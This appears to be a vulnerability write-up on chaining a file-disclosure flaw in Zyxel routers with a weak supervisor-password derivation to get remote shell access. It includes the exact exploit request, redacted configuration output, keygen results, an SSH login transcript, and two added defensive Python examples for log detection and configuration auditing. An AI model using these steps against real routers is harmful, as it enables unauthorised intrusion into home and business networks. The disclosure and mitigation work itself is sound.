Zyxel router chained RCE using LFI and Weak Password Derivation Algorithm (No CVE)
Description
Multiple Zyxel devices are prone to several critical vulnerabilities resulting from insecure coding practices and insecure configuration.
Besides the unauthenticated buffer overflow in the zhttpd web server, two other vulnerabilities, an unauthenticated local file disclosure (LFI) combined with a weak password derivation algorithm for the supervisor user, can be chained into an unauthenticated RCE.
The remote code execution (RCE) is achieved by first exploiting the local file disclosure (LFI) vulnerability in the zhttpd binary, which allows an unauthenticated attacker to read the entire configuration of the router via the vulnerable endpoint /Export_Log?/data/zcfg_config.json.
With this disclosed information, the attacker can determine whether the router is reachable via SSH and then use the second vulnerability, in the zcmd binary, to derive the supervisor password by exploiting a weak password derivation algorithm based on the device serial number.
The following devices are affected:
AMG1302-T11C EOL
VMG3925-B10C EOL
VMG8924-B10D EOL
VMG1312-B10D EOL
VMG3312-T20A EOL
VMG3625-T20A EOL
VMG3925-B10B EOL
VMG3925-B10C EOL
VMG3925-B30C EOL
VMG3926-B10A EOL
VMG5313-B10B EOL
VMG5313-B30B EOL
VMG8623-T50A EOL
VMG8823-B10B EOL
VMG8823-B30B EOL
VMG8823-B50B EOL
VMG8823-B60B EOL
VMG8924-B10D EOL
VMG8924-B30D EOL
PMG5317-T20A EOL
DX3301-T0 V5.50(ABVY.3)C0 in Sep. 2022*
DX5401-B0 V5.17(ABYO.1)C0*
EMG3525-T50B EMEA – V5.50(ABPM.6)C0* || S. America – V5.50(ABSL.0)b12 in Sep. 2022*
EMG5523-T50B EMEA – V5.50(ABPM.6)C0* || S. America – V5.50(ABSL.0)b12 in Sep. 2022*
EMG5723-T50K V5.50(ABOM.7)C0*
EX3301-T0 V5.50(ABVY.3)C0 in Sep. 2022*
EX5401-B0 V5.17(ABYO.1)C0*
EX5501-B0 V5.17(ABRY.2)C0*
LTE3301-PLUS V1.00(ABQU.3)C0*
LTE7240-M403 V2.00(ABMG.4)C0*
VMG1312-T20B V5.50(ABSB.5)C0*
VMG3625-T50B V5.50(ABPM.6)C0*
VMG3927-B50A V5.17(ABMT.6)C0*
VMG3927-B60A V5.17(ABMT.6)C0*
VMG3927-T50K V5.50(ABOM.7)C0*
VMG4005-B50A V5.15(ABQA.2)C0 in Mar. 2022*
VMG8623-T50B V5.50(ABPM.6)C0*
VMG8825-B50A V5.17(ABMT.6)C0*
VMG8825-B50B V5.17(ABNY.7)C0*
VMG8825-B60A V5.17(ABMT.6)C0*
VMG8825-B60B V5.17(ABNY.7)C0*
VMG8825-T50K V5.50(ABOM.7)C0*
XMG3927-B50A V5.17(ABMT.6)C0*
XMG8825-B50A V5.17(ABMT.6)C0*
Firewall:
VPN2S V1.20(ABLN.2)_00210319C1*
ONT:
AX7501-B0 V5.17(ABPC.1)C0*
EP240P V5.40(ABVH.1)C0 in May 2022*
PMG5317-T20B V5.40(ABKI.4)C0 in Apr. 2022*
PMG5617GA V5.40(ABNA.2)C0 in Apr. 2022*
PMG5622GA V5.40(ABNB.2)C0 in Apr. 2022*
WiFi extender:
WX3100-T0 V5.50(ABVL.1)C0 in Mar. 2022*
WX3401-B0 V5.17(ABVE.1)C0*
WiFi system:
WSQ50 (Multy X) V2.20(ABKJ.7)C0
WSQ60 (Multy Plus) V2.20(ABND.8)C0
Ratings
Attacker Value: Very High
Exploitability: Very High
Technical Analysis
In December 2022, SEC Consult released a blog post titled The enemy from within: Unauthenticated Buffer Overflows in Zyxel routers still haunting users. The post explains an unauthenticated buffer overflow in more than 40 different Zyxel router models and the vast number of routers, in the thousands, that are vulnerable and accessible from the Internet.
The impact is still quite limited because the published Metasploit exploit module only works from the LAN side.
However, the unauthenticated buffer overflow is not the only vulnerability on these routers: SEC Consult discovered another 7 vulnerabilities that are described in their security analysis Multiple Critical Vulnerabilities in multiple Zyxel devices.
While reading the security analysis and reviewing the other vulnerabilities, I discovered a new opportunity to build an exploit by chaining two other vulnerabilities that allows an unauthenticated attacker to get privileged access to the Zyxel router from either the WAN or LAN side. The potential of this exploit to attack from the WAN side makes it quite dangerous, taking into account the large number of unpatched Zyxel routers out there on the Internet.
Recently, CVE-2023-28770 was published, covering the LFI vulnerability that is used in this chained exploit.
Zyxel router chained RCE
Exploiting an unauthenticated local file disclosure (LFI) vulnerability and a weak password derivation algorithm
The first vulnerability that stood out to me is the LFI vulnerability discussed in section 2 of the Security Analysis by SEC Consult.
The LFI vulnerability is present in the zhttpd binary and allows an unauthenticated attacker to read the entire configuration of the router via the vulnerable endpoint /Export_Log?/data/zcfg_config.json.
The Burp request below shows a redacted response with the disclosed information: encrypted passwords, account information, service configuration (FTP, Telnet, SSH) and hardware details such as the serial number and hardware model. In total around 4000 lines of nested JSON that you would not like to share with anyone out there.
LFI Burp request and response
GET /Export_Log?/data/zcfg_config.json HTTP/1.1
Host: zyxel-vuln-router:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Connection: close
Response (REDACTED)
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 148678
Date: Fri, 14 Apr 2023 08:47:46 GMT
X-Frame-Options: sameorigin
Content-Security-Policy: frame-ancestors 'self'

---- Hardware Information ----
{
  "Manufacturer":"ZYXEL", "ManufacturerOUI":"XXXXX", "ModelName":"VMG3625-T20A",
  "Description":"Wireless AC VDSL2 4-port Gateway with USB", "ProductClass":"VMG3625-T20A",
  "SerialNumber":"SXXXXXXXXXXXX", "SoftwareVersion":"V5.30(ABOU.2)b1_I0_20180821",
  "AdditionalHardwareVersion":"", "AdditionalSoftwareVersion":"", "UpTime":607055,
  "FirstUseDate":"2023-03-21T09:07:41", "VendorConfigFileNumberOfEntries":0,
  "SupportedDataModelNumberOfEntries":0, "ProcessorNumberOfEntries":0,
  "VendorLogFileNumberOfEntries":0, "LocationNumberOfEntries":0, "FixManufacturerOUI":""
},

---- Account Information ----
"X_ZYXEL_LoginCfg":{
  "LoginGroupConfigurable":true,
  "LogGp":[
    {
      "GP_Privilege":"_encrypt_XXXXXXXXXXXXXX",
      "Account":[
        {
          "AutoShowQuickStart":false, "Enabled":true, "EnableQuickStart":true, "Page":"",
          "Username":"root", "Password":"", "PasswordHash":"", "Privilege":"_encrypt_XXXXXXXXXXXXX",
          "GetConfigByFtp":true, "DefaultPassword":"_encrypt_XXXXXXXXXXXXXX", "DefaultGuiPassword":"",
          "ResetDefaultPassword":false,
          "shadow":"root:$6$XXXXXXXXXXX:0::::::\n",
          "smbpasswd":"root:0:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:33A9D53C23525B5F63A0C536445E2B76:[U ]:LCT-0000004E:\n",
          "ConfigAccountFromWAN":false, "DefPwLength":8, "AccountCreateTime":0, "AccountRetryTime":3,
          "AccountIdleTime":300, "AccountLockTime":300, "RemoHostAddress":"", "DotChangeDefPwd":false,
          "ShowSkipBtnInChgDefPwdPage":false, "AutoGenPwdBySn":false, "RemoteAccessPrivilege":"LAN",
          "OldDefaultPassword":"", "CardOrder":"", "ThemeColor":"", "HiddenPage":""
        },
        {
          "AutoShowQuickStart":false, "Enabled":true, "EnableQuickStart":true, "Page":"",
          "Username":"supervisor", "Password":"", "PasswordHash":"", "Privilege":"_encrypt_XXXXXXXXXXX",
          "DefaultPassword":"_encrypt_XXXXXXXXXXX", "DefaultGuiPassword":"",
          "ResetDefaultPassword":false,
          "shadow":"supervisor:$6$XXXXXXXXXX:0::::::\n",
          "smbpasswd":"supervisor:12:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:33A9D53C23525B5F63A0C536445E2B76:[U ]:LCT-0000004E:\n",
          "ConfigAccountFromWAN":false, "DefPwLength":8, "AccountCreateTime":0, "AccountRetryTime":3,
          "AccountIdleTime":300, "AccountLockTime":300, "RemoHostAddress":"", "DotChangeDefPwd":false,
          "ShowSkipBtnInChgDefPwdPage":false, "AutoGenPwdBySn":false, "RemoteAccessPrivilege":"LAN",
          "OldDefaultPassword":"", "CardOrder":"", "ThemeColor":"", "HiddenPage":""
        }
      ],
      "Level":"high"
    },

---- Service Information ----
"X_ZYXEL_RemoteManagement":{
  "Service":[
    { "Name":"HTTP", "Enable":true, "Protocol":6, "Port":8080, "Mode":"LAN_WAN", "TrustAll":true, "OldMode":"LAN_ONLY", "RestartDeamon":1, "LifeTime":20, "BoundInterfaceList":"" },
    { "Name":"HTTPS", "Enable":true, "Protocol":6, "Port":443, "Mode":"LAN_WAN", "TrustAll":true, "OldMode":"LAN_ONLY", "RestartDeamon":true, "LifeTime":20, "BoundInterfaceList":"" },
    { "Name":"FTP", "Enable":true, "Protocol":6, "Port":21, "Mode":"LAN_WAN", "TrustAll":true, "OldMode":"LAN_ONLY", "RestartDeamon":true, "LifeTime":20, "BoundInterfaceList":"" },
    { "Name":"TELNET", "Enable":true, "Protocol":6, "Port":23, "Mode":"LAN_WAN", "TrustAll":true, "OldMode":"LAN_ONLY", "RestartDeamon":true, "LifeTime":20, "BoundInterfaceList":"" },
    { "Name":"SSH", "Enable":true, "Protocol":6, "Port":22, "Mode":"LAN_WAN", "TrustAll":true, "OldMode":"LAN_ONLY", "RestartDeamon":true, "LifeTime":20, "BoundInterfaceList":"" },
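As an added defender-side example (not part of the original assessment), the following Python scans web server access-log lines for requests to the disclosed Export_Log endpoint; the log lines and their common-log-format layout are constructed for illustration, and the severity labels are an assumption of this example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (common log format); not taken from a real device.
SAMPLE_LOG = """\
203.0.113.7 - - [14/Apr/2023:08:47:46 +0000] "GET /Export_Log?/data/zcfg_config.json HTTP/1.1" 200 148678
198.51.100.2 - - [14/Apr/2023:08:48:01 +0000] "GET /login HTTP/1.1" 200 1024
203.0.113.7 - - [14/Apr/2023:08:48:09 +0000] "GET /Export_Log?%2Fdata%2Fzcfg_config.json HTTP/1.1" 200 148678
192.0.2.5 - - [14/Apr/2023:08:49:00 +0000] "GET /Export_Log?/tmp/somelog HTTP/1.1" 200 512
"""

REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# The endpoint documented in the write-up as returning the whole router configuration.
CONFIG_PATH = "/data/zcfg_config.json"


def classify_export_log(target):
    """Return a severity for a request target, or None when it is not an Export_Log read.

    The known configuration path is 'high'; any other Export_Log request whose query
    is an absolute filesystem path is 'medium' and worth a manual look.
    """
    path, sep, query = target.partition("?")
    if path != "/Export_Log" or not sep:
        return None
    query = unquote(query)  # catch percent-encoded variants such as %2Fdata%2F...
    if query == CONFIG_PATH:
        return "high"
    if query.startswith("/"):
        return "medium"
    return None


def scan_log(text):
    """Parse each log line and collect the Export_Log reads with source, target and status."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        sev = classify_export_log(m["target"])
        if sev:
            # A 200 status with a large body indicates the file was actually served.
            hits.append({"src": m["src"], "target": m["target"],
                         "status": int(m["status"]), "severity": sev})
    return hits
```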
Now, this information disclosure in itself does not pose a direct threat to these routers. Attackers could of course try to crack the obtained shadow password hashes, but this would take a long time.
So is there any other way to use the disclosed information for a successful attack?
And of course the answer is YES!
The second vulnerability that comes into play is the one described in section 3 of the analysis, “Unsafe Storage of Sensitive Data”. It explains the password derivation technique used to decrypt the _encrypt_XXXXXX passwords in the JSON configuration file using a static AES key and IV.
But my attention was drawn more to another analysis, Getting root on a Zyxel VMG8825-T50 router, done by Thomas Rinsma in 2020, which is referenced at the bottom of that section and in which Thomas explains the password derivation techniques used on Zyxel routers. In particular, the section “Tangent 2: key and password derivation mechanisms” is quite interesting: it describes in detail how the supervisor user's password can be derived from the serial number of the router.
So what if we use the LFI vulnerability to obtain the serial number of the router and derive the supervisor password using this password derivation technique? We can then use the disclosed router services information to check whether ssh or telnet is enabled and accessible from the WAN, and try to log in as supervisor to gain access to the router.
Bogi Napoleon Wennerstrøm has reverse engineered and implemented some of these derivation functions producing the supervisor password. His repository can be found here on Github.
I tested his password derivation functions and can confirm that either zcfgBeCommonGenKeyBySerialNumMethod2 or zcfgBeCommonGenKeyBySerialNumMethod3 works on vulnerable Zyxel routers.
# python ./main.py SXXXXXXXXXXXX <= redacted
zcfgBeCommonGenKeyBySerialNum : L8PBA3JD6H
zcfgBeCommonGenKeyBySerialNum_CBT : 4a88dfa2
zcfgBeCommonGenKeyBySerialNumMethod2 : 4a88dfa2 =>
zcfgBeCommonGenKeyBySerialNumMethod3 : aN66Q5D31Y <=
zcfgBeCommonGenKeyBySerialNumConfigLength(1) : 778V3W7O
zcfgBeCommonGenKeyBySerialNumConfigLength(2) : Yd3HvMpU
zcfgBeCommonGenKeyBySerialNumConfigLength(3) : dByHvMzZ
zcfgBeCommonGenKeyBySerialNumConfigLengthOld(1) : 778V3W7O
zcfgBeCommonGenKeyBySerialNumConfigLengthOld(2) : Yd3HvMpU
zcfgBeCommonGenKeyBySerialNumConfigLengthOld(3) : dByHvMzZ

┌──(root💀cuckoo)-[~/zyxel_exploit/zyxel-vmg8825-keygen]
└─# ssh supervisor@zyxel-vuln-router
supervisor@zyxel-vuln-router's password:
$ uname -a
Linux VMG3625-T20A 2.6.36 #7 SMP Sat Aug 18 12:18:02 CET 2018 mips GNU/Linux
$ id
uid=12(supervisor) gid=12 groups=12
$
I have created a Metasploit module that chains these two vulnerabilities together to gain access to vulnerable Zyxel routers. PR submission to mainstream Metasploit is in progress.
Mitigation
Please follow this Security Advisory of Zyxel to patch your router.
As a temporary measure, you should disable all services on the router, such as telnet, ftp and ssh, that allow access to the supervisor user, and configure your web interface to be accessible only by the admin user.
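To check the temporary mitigation against an exported configuration, the following added example (not part of the original assessment) audits the X_ZYXEL_RemoteManagement service list shown in the disclosed response above and reports every enabled service whose Mode is not LAN_ONLY. The excerpt is constructed with made-up values that mirror the page's field names, and the recommended actions are this example's reading of the Mitigation section.

```python
import json

# Constructed configuration excerpt mirroring the disclosed X_ZYXEL_RemoteManagement
# structure; the values are invented and do not come from a real device.
SAMPLE_CONFIG = json.loads("""
{
  "X_ZYXEL_RemoteManagement": {
    "Service": [
      {"Name": "HTTP",   "Enable": true,  "Protocol": 6, "Port": 8080, "Mode": "LAN_WAN"},
      {"Name": "HTTPS",  "Enable": true,  "Protocol": 6, "Port": 443,  "Mode": "LAN_ONLY"},
      {"Name": "FTP",    "Enable": false, "Protocol": 6, "Port": 21,   "Mode": "LAN_WAN"},
      {"Name": "TELNET", "Enable": true,  "Protocol": 6, "Port": 23,   "Mode": "LAN_WAN"},
      {"Name": "SSH",    "Enable": true,  "Protocol": 6, "Port": 22,   "Mode": "LAN_WAN"}
    ]
  }
}
""")

# Services the Mitigation section names as giving the supervisor account access;
# the web interface is treated separately (restrict rather than disable).
SHELL_SERVICES = {"SSH", "TELNET", "FTP"}


def wan_exposed_services(cfg):
    """Return enabled remote-management services whose Mode includes the WAN side.

    "LAN_WAN" is the exposed value shown in the disclosed configuration; "LAN_ONLY"
    is the safe value and is not reported.
    """
    services = cfg.get("X_ZYXEL_RemoteManagement", {}).get("Service", [])
    return [
        {"name": s["Name"], "port": s["Port"], "mode": s.get("Mode", "")}
        for s in services
        if s.get("Enable") and "WAN" in s.get("Mode", "")
    ]


def mitigation_findings(cfg):
    """Pair each WAN-exposed service with the action the temporary mitigation calls for."""
    findings = []
    for s in wan_exposed_services(cfg):
        if s["name"] in SHELL_SERVICES:
            action = "disable: grants supervisor login if the password is derived"
        else:
            action = "restrict to LAN_ONLY and admin-only access"
        findings.append((s["name"], s["port"], action))
    return findings
```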
References
CVE-2023-28770
The enemy from within: Unauthenticated Buffer Overflows in Zyxel routers still haunting users
Multiple Critical Vulnerabilities in multiple Zyxel devices
Getting root on a Zyxel VMG8825-T50 router
Zyxel VMG8825-T50 Supervisor Keygen – Github
Zyxel Security Advisory
Metasploit PR: Zyxel router chained RCE using LFI and weak password derivation algorithm
Credits
Credits go to:
SEC Consult team
Thomas Rinsma
Bogi Napoleon Wennerstrøm